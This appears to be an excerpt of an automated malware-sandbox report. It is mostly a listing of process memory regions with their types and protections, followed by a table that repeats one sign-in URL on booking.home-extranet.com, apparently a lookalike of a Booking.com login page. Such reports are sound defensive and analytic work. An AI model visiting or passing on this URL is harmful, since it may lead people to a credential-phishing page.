52B6000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
7C20000
|
heap
|
page read and write
|
||
|
698F000
|
stack
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
2FDB000
|
heap
|
page read and write
|
||
|
7245000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
5A0C000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
54CC000
|
trusted library allocation
|
page read and write
|
||
|
2A7B000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
7CDE000
|
stack
|
page read and write
|
||
|
23C7000
|
heap
|
page read and write
|
||
|
4A1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
53F0000
|
heap
|
page readonly
|
||
|
4430000
|
heap
|
page read and write
|
||
|
508B000
|
trusted library allocation
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
6169000
|
trusted library allocation
|
page read and write
|
||
|
48B2000
|
trusted library allocation
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F50000
|
heap
|
page readonly
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
87A2000
|
heap
|
page read and write
|
||
|
2EE6000
|
heap
|
page read and write
|
||
|
8210000
|
heap
|
page read and write
|
||
|
2E5B000
|
stack
|
page read and write
|
||
|
4BAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
82EC000
|
heap
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
64C1000
|
trusted library allocation
|
page read and write
|
||
|
483D000
|
stack
|
page read and write
|
||
|
4BAA000
|
trusted library allocation
|
page read and write
|
||
|
71D6000
|
heap
|
page read and write
|
||
|
288D000
|
heap
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
403F000
|
stack
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
4BB0000
|
trusted library allocation
|
page read and write
|
||
|
49C5000
|
trusted library allocation
|
page read and write
|
||
|
27C7000
|
heap
|
page read and write
|
||
|
773E000
|
stack
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page execute and read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
7EEC000
|
heap
|
page read and write
|
||
|
7EF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
72C2000
|
trusted library allocation
|
page read and write
|
||
|
5161000
|
trusted library allocation
|
page read and write
|
||
|
87AE000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
4720000
|
trusted library allocation
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
58A8000
|
trusted library allocation
|
page read and write
|
||
|
4660000
|
trusted library allocation
|
page read and write
|
||
|
50B7000
|
trusted library allocation
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
822F000
|
stack
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
403D000
|
stack
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
4609000
|
stack
|
page read and write
|
||
|
84AE000
|
stack
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
5BBD000
|
trusted library allocation
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
6F9E000
|
heap
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FBF000
|
heap
|
page read and write
|
||
|
47E0000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
6CFF000
|
stack
|
page read and write
|
||
|
7E2A000
|
trusted library allocation
|
page read and write
|
||
|
5430000
|
heap
|
page read and write
|
||
|
4F82000
|
trusted library allocation
|
page read and write
|
||
|
7D6E000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
722F000
|
heap
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
6F62000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
6D0E000
|
stack
|
page read and write
|
||
|
7EE8000
|
heap
|
page read and write
|
||
|
8AB3000
|
trusted library allocation
|
page read and write
|
||
|
4A60000
|
heap
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
3F40000
|
heap
|
page read and write
|
||
|
50A0000
|
trusted library allocation
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
70C0000
|
trusted library allocation
|
page read and write
|
||
|
7741000
|
heap
|
page read and write
|
||
|
7EE0000
|
heap
|
page read and write
|
||
|
5851000
|
trusted library allocation
|
page read and write
|
||
|
6DED000
|
stack
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
8429000
|
stack
|
page read and write
|
||
|
4A14000
|
trusted library allocation
|
page read and write
|
||
|
2A08000
|
heap
|
page read and write
|
||
|
54BF000
|
stack
|
page read and write
|
||
|
7E9D000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
5228000
|
trusted library allocation
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page execute and read and write
|
||
|
7198000
|
trusted library allocation
|
page read and write
|
||
|
776C000
|
heap
|
page read and write
|
||
|
53C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
76DB000
|
stack
|
page read and write
|
||
|
7786000
|
heap
|
page read and write
|
||
|
7FDA000
|
heap
|
page read and write
|
||
|
4ABE000
|
stack
|
page read and write
|
||
|
6A0A000
|
stack
|
page read and write
|
||
|
4A60000
|
trusted library allocation
|
page read and write
|
||
|
5503000
|
trusted library allocation
|
page read and write
|
||
|
7E1E000
|
stack
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
6F55000
|
heap
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page execute and read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
6EFE000
|
heap
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
53CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
43A0000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
44FE000
|
stack
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
5ADD000
|
trusted library allocation
|
page read and write
|
||
|
4B08000
|
trusted library allocation
|
page read and write
|
||
|
48E9000
|
stack
|
page read and write
|
||
|
5B59000
|
trusted library allocation
|
page read and write
|
||
|
415E000
|
stack
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
7E40000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
83ED000
|
stack
|
page read and write
|
||
|
87DD000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
8620000
|
heap
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
860E000
|
stack
|
page read and write
|
||
|
4A3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8CCF000
|
stack
|
page read and write
|
||
|
50FE000
|
stack
|
page read and write
|
||
|
8D8E000
|
stack
|
page read and write
|
||
|
80D2000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page execute and read and write
|
||
|
77BF000
|
stack
|
page read and write
|
||
|
4715000
|
trusted library allocation
|
page execute and read and write
|
||
|
28EE000
|
stack
|
page read and write
|
||
|
26D8000
|
heap
|
page read and write
|
||
|
3FB0000
|
heap
|
page read and write
|
||
|
726B000
|
heap
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
7D7E000
|
stack
|
page read and write
|
||
|
769E000
|
stack
|
page read and write
|
||
|
7257000
|
trusted library allocation
|
page read and write
|
||
|
46D0000
|
trusted library allocation
|
page read and write
|
||
|
52AE000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
5898000
|
trusted library allocation
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
8700000
|
heap
|
page read and write
|
||
|
779C000
|
heap
|
page read and write
|
||
|
300F000
|
heap
|
page read and write
|
||
|
71ED000
|
stack
|
page read and write
|
||
|
46F0000
|
trusted library allocation
|
page read and write
|
||
|
6F48000
|
heap
|
page read and write
|
||
|
7C4A000
|
trusted library allocation
|
page read and write
|
||
|
64C4000
|
trusted library allocation
|
page read and write
|
||
|
4840000
|
heap
|
page read and write
|
||
|
6C6E000
|
stack
|
page read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
7739000
|
heap
|
page read and write
|
||
|
463D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8204000
|
heap
|
page read and write
|
||
|
5265000
|
trusted library allocation
|
page read and write
|
||
|
2AB2000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
8762000
|
heap
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
6EC5000
|
heap
|
page read and write
|
||
|
709A000
|
trusted library allocation
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
445E000
|
stack
|
page read and write
|
||
|
7E27000
|
trusted library allocation
|
page read and write
|
||
|
53A0000
|
trusted library allocation
|
page read and write
|
||
|
87EE000
|
heap
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
483C000
|
stack
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
3FB7000
|
heap
|
page read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
5393000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
11B000
|
stack
|
page read and write
|
||
|
8738000
|
heap
|
page read and write
|
||
|
73BA000
|
trusted library allocation
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BD2000
|
trusted library allocation
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
453E000
|
stack
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
6DEE000
|
stack
|
page read and write
|
||
|
3546000
|
heap
|
page read and write
|
||
|
45CD000
|
stack
|
page read and write
|
||
|
82C7000
|
heap
|
page read and write
|
||
|
48CB000
|
trusted library allocation
|
page read and write
|
||
|
723B000
|
trusted library allocation
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
4A20000
|
trusted library allocation
|
page read and write
|
||
|
4710000
|
trusted library allocation
|
page read and write
|
||
|
4CA5000
|
trusted library allocation
|
page read and write
|
||
|
3518000
|
heap
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
4728000
|
trusted library allocation
|
page read and write
|
||
|
8032000
|
trusted library allocation
|
page read and write
|
||
|
58C5000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
trusted library allocation
|
page read and write
|
||
|
4FC3000
|
trusted library allocation
|
page read and write
|
||
|
698B000
|
stack
|
page read and write
|
||
|
7F56000
|
heap
|
page read and write
|
||
|
7F5B8000
|
trusted library allocation
|
page execute and read and write
|
||
|
7240000
|
trusted library allocation
|
page execute and read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
7F82000
|
heap
|
page read and write
|
||
|
4E2D000
|
stack
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
76BE000
|
stack
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
7DDE000
|
stack
|
page read and write
|
||
|
29EF000
|
stack
|
page read and write
|
||
|
4230000
|
heap
|
page read and write
|
||
|
53A3000
|
trusted library allocation
|
page read and write
|
||
|
2782000
|
heap
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
82DE000
|
heap
|
page read and write
|
||
|
6EB8000
|
heap
|
page read and write
|
||
|
4BA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D87000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
74ED000
|
stack
|
page read and write
|
||
|
861E000
|
stack
|
page read and write
|
||
|
4847000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
6C7F000
|
stack
|
page read and write
|
||
|
8902000
|
trusted library allocation
|
page read and write
|
||
|
6D8D000
|
stack
|
page read and write
|
||
|
814E000
|
stack
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
5B51000
|
trusted library allocation
|
page read and write
|
||
|
72A5000
|
heap
|
page execute and read and write
|
||
|
8D0E000
|
stack
|
page read and write
|
||
|
2F88000
|
heap
|
page read and write
|
||
|
4F87000
|
heap
|
page read and write
|
||
|
7FD6000
|
heap
|
page read and write
|
||
|
7250000
|
heap
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
4634000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
4BD5000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D6000
|
heap
|
page read and write
|
||
|
7ED0000
|
heap
|
page read and write
|
||
|
7EBA000
|
heap
|
page read and write
|
||
|
6CAC000
|
stack
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
4B5E000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
8402000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
158000
|
stack
|
page read and write
|
||
|
8420000
|
trusted library allocation
|
page execute and read and write
|
||
|
8245000
|
heap
|
page read and write
|
||
|
82EE000
|
heap
|
page read and write
|
||
|
3FFE000
|
stack
|
page read and write
|
||
|
4420000
|
heap
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
87F9000
|
heap
|
page read and write
|
||
|
4710000
|
heap
|
page readonly
|
||
|
6A9D000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
821C000
|
heap
|
page read and write
|
||
|
6F91000
|
heap
|
page read and write
|
||
|
8275000
|
heap
|
page read and write
|
||
|
4A13000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F5C000
|
heap
|
page read and write
|
||
|
46CE000
|
stack
|
page read and write
|
||
|
4640000
|
trusted library allocation
|
page read and write
|
||
|
720A000
|
heap
|
page read and write
|
||
|
8157000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
6E60000
|
heap
|
page execute and read and write
|
||
|
513E000
|
stack
|
page read and write
|
||
|
5871000
|
trusted library allocation
|
page read and write
|
||
|
7E94000
|
heap
|
page read and write
|
||
|
4F5A000
|
trusted library allocation
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
8D4C000
|
stack
|
page read and write
|
||
|
7F5A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
876F000
|
heap
|
page read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
6D10000
|
trusted library allocation
|
page read and write
|
||
|
21E000
|
stack
|
page read and write
|
||
|
6DB1000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
7F22000
|
heap
|
page read and write
|
||
|
411E000
|
stack
|
page read and write
|
||
|
487E000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
4680000
|
trusted library allocation
|
page read and write
|
||
|
6161000
|
trusted library allocation
|
page read and write
|
||
|
85DD000
|
stack
|
page read and write
|
||
|
723D000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
heap
|
page read and write
|
||
|
470A000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F38000
|
heap
|
page read and write
|
||
|
715B000
|
stack
|
page read and write
|
||
|
3450000
|
trusted library section
|
page read and write
|
||
|
6304000
|
trusted library allocation
|
page read and write
|
||
|
4712000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
4B90000
|
trusted library allocation
|
page read and write
|
||
|
6F4B000
|
heap
|
page read and write
|
||
|
226000
|
heap
|
page read and write
|
||
|
7FC98000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CBB000
|
stack
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
26E8000
|
heap
|
page read and write
|
||
|
7F12000
|
heap
|
page read and write
|
||
|
3EEE000
|
stack
|
page read and write
|
||
|
58A4000
|
trusted library allocation
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
4A45000
|
trusted library allocation
|
page execute and read and write
|
||
|
4700000
|
trusted library allocation
|
page read and write
|
||
|
4867000
|
heap
|
page read and write
|
||
|
419E000
|
stack
|
page read and write
|
||
|
2837000
|
stack
|
page read and write
|
||
|
6BFE000
|
stack
|
page read and write
|
||
|
6F1D000
|
heap
|
page read and write
|
||
|
77FF000
|
stack
|
page read and write
|
||
|
7778000
|
heap
|
page read and write
|
||
|
7033000
|
trusted library allocation
|
page read and write
|
||
|
876E000
|
stack
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
46E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
7ED4000
|
heap
|
page read and write
|
||
|
4FA6000
|
trusted library allocation
|
page read and write
|
||
|
846E000
|
stack
|
page read and write
|
||
|
8720000
|
heap
|
page read and write
|
||
|
6F1F000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
23F7000
|
heap
|
page read and write
|
||
|
27FC000
|
heap
|
page read and write
|
||
|
7E38000
|
heap
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
777A000
|
stack
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
270B000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
6BD0000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
7EDC000
|
heap
|
page read and write
|
||
|
6F2A000
|
heap
|
page read and write
|
||
|
717E000
|
stack
|
page read and write
|
||
|
778D000
|
heap
|
page read and write
|
||
|
6EE9000
|
heap
|
page read and write
|
||
|
77AC000
|
heap
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
71E5000
|
heap
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
70D0000
|
trusted library allocation
|
page read and write
|
||
|
4851000
|
trusted library allocation
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
6D30000
|
trusted library allocation
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
4A40000
|
trusted library allocation
|
page read and write
|
||
|
76F0000
|
heap
|
page execute and read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
7714000
|
heap
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
4662000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
85CE000
|
stack
|
page read and write
|
||
|
6C7D000
|
stack
|
page read and write
|
||
|
447E000
|
stack
|
page read and write
|
||
|
87D5000
|
heap
|
page read and write
|
||
|
6DF0000
|
heap
|
page read and write
|
||
|
6BCC000
|
stack
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
46F9000
|
trusted library allocation
|
page read and write
|
||
|
358B000
|
heap
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page execute and read and write
|
||
|
86ED000
|
stack
|
page read and write
|
||
|
820C000
|
heap
|
page read and write
|
||
|
2749000
|
heap
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
87C8000
|
heap
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
4B47000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7275000
|
heap
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
470E000
|
stack
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
4840000
|
trusted library allocation
|
page execute and read and write
|
||
|
3013000
|
heap
|
page read and write
|
||
|
70F3000
|
trusted library allocation
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
6CC0000
|
heap
|
page execute and read and write
|
||
|
4750000
|
heap
|
page execute and read and write
|
||
|
2D67000
|
heap
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
4A42000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
stack
|
page read and write
|
||
|
47D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E44000
|
heap
|
page read and write
|
||
|
3578000
|
heap
|
page read and write
|
||
|
62F5000
|
trusted library allocation
|
page read and write
|
||
|
4F68000
|
trusted library allocation
|
page read and write
|
||
|
22DB000
|
stack
|
page read and write
|
||
|
43FE000
|
stack
|
page read and write
|
||
|
5400000
|
trusted library allocation
|
page execute and read and write
|
||
|
49A5000
|
trusted library allocation
|
page read and write
|
||
|
71FD000
|
stack
|
page read and write
|
||
|
756E000
|
stack
|
page read and write
|
||
|
4649000
|
trusted library allocation
|
page read and write
|
||
|
4CE7000
|
trusted library allocation
|
page read and write
|
||
|
7FB5000
|
heap
|
page read and write
|
||
|
8208000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
6B8C000
|
stack
|
page read and write
|
||
|
58D4000
|
trusted library allocation
|
page read and write
|
||
|
4FCE000
|
stack
|
page read and write
|
||
|
5879000
|
trusted library allocation
|
page read and write
|
||
|
4B7B000
|
stack
|
page read and write
|
||
|
6AC0000
|
heap
|
page read and write
|
There are 772 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
|
|
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
|
|
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
|
|
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
||
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
||
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
||
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
||
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|
||
|
https://booking.home-extranet.com/sign-in?0p_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI
|